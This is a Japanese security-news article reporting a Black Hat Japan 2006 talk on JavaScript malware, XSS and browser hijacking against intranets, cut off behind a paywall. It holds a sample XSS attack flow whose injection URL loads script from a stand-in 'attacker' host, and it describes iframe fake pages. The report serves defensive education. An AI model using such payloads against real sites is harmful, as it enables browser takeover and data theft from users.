Black Hat Japan 2006 Briefings 潜入レポート(4) | ScanNetSecurity
2021.01.18(月)

Black Hat Japan 2006 Briefings 潜入レポート(4)

イントラネットへの外部からの攻撃: 進化するJavaScriptマルウェアとブラウザー奪取の危険性(2)

特集 特集
イントラネットへの外部からの攻撃:
進化するJavaScriptマルウェアとブラウザー奪取の危険性(2)

2006年10月5日,6日に新宿で開催され盛況のうちに幕を閉じた、国際セキュリティ会議 Black Hat Japan 2006 Briefings には、世界各国及び日本国内から、著名なコンピュータセキュリティのエキスパートが集結、世界トップクラスの研究成果と、知識・経験が発表されました。

会期中は、多数の入場者が訪れたばかりか、その選りすぐられた講師陣が海外でも話題を呼び、ヨーロッパ等国外からの参加者も多数来日しました。

同会議には今年も昨年に引き続き、日頃SCANに寄稿いただいている専門技術者の方が、レポーターとして、参加しました。「Winny」「カーネル内でのWindowsフォレンジック分析」「イントラネットへの外部からの攻撃」「AJAXウェブアプリケーションへの攻撃」等、BHJ2006 のハイライトの一部を紹介します。

──────

本講演のデモ環境は、被害サーバとしてブログで有名なMovable Type 3.2(XSSの脆弱性が存在する)が利用された。

まず、手始めに比較的馴染みのあるユーザの情報を収集するためのJavaScriptを紹介した。いずれも、XSSの脆弱性が存在するWebサーバを悪用することを前提として紹介した。殆どのデモが以下の流れで行われた。

STEP 1:攻撃用サイトにJavaScriptマルウェアを準備
http://attacker/JavaScript_malware.js
STEP 2:被害サーバにXSSの脆弱性があることを確認
http://victim/app.cgi?vuln=foo
STEP 3:リンクを張り、標的となるユーザを誘導する
http://victim/app.cgi?vuln=SRC="http://attacker/JavaScript_malware.js">

●JavaScript Malwareによるイントラネットハッキング(2)

・偽サイトの作成デモ
攻撃の基点となるXSSの脆弱性を保有するWebサイトに対し、iframeを悪用し偽ページを作成する。メールや掲示板に、偽サイトへ誘導するためのリンクを張り、悪意のあるページに誘導する。偽サイトにアクセスしたユーザは、次に説明するマルウェアによりWebブラウザをコントロールされることになる。

・JavaScript ゾンビ / トロイの木馬
最後に総集編として、偽サイトを踏んだ後にブラウザのコントロールを奪取するデモが行われた。このscriptにより…

株式会社ラック
コンピュータセキュリティ研究所
所長 岩井 博樹
CSL紹介
http://www.lac.co.jp/business/sns/intelligence/csl_report.html

──
(この記事には続きがあります。続きはScan本誌をご覧ください)
http://www.ns-research.jp/cgi-bin/ct/p.cgi?m-sc_netsec
《ScanNetSecurity》

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

カテゴリ別新着記事

★★ ( FB ログイン可) 会員限定記事、週 1 回のメルマガ、人気ニュースランキング、特集一覧をお届け…無料会員登録はアドレスのみで所要 1 分程度 ★★
★★ ( FB ログイン可) 会員限定記事、週 1 回のメルマガ、人気ニュースランキング、特集一覧をお届け…無料会員登録はアドレスのみで所要 1 分程度 ★★

登録すれば、記事一覧、人気記事ランキング、BASIC 会員限定記事をすべて閲覧できます。毎週月曜朝には一週間のまとめメルマガをお届けします(BASIC 登録後 PREMIUM にアップグレードすれば全ての限定コンテンツにフルアクセスできます)。

×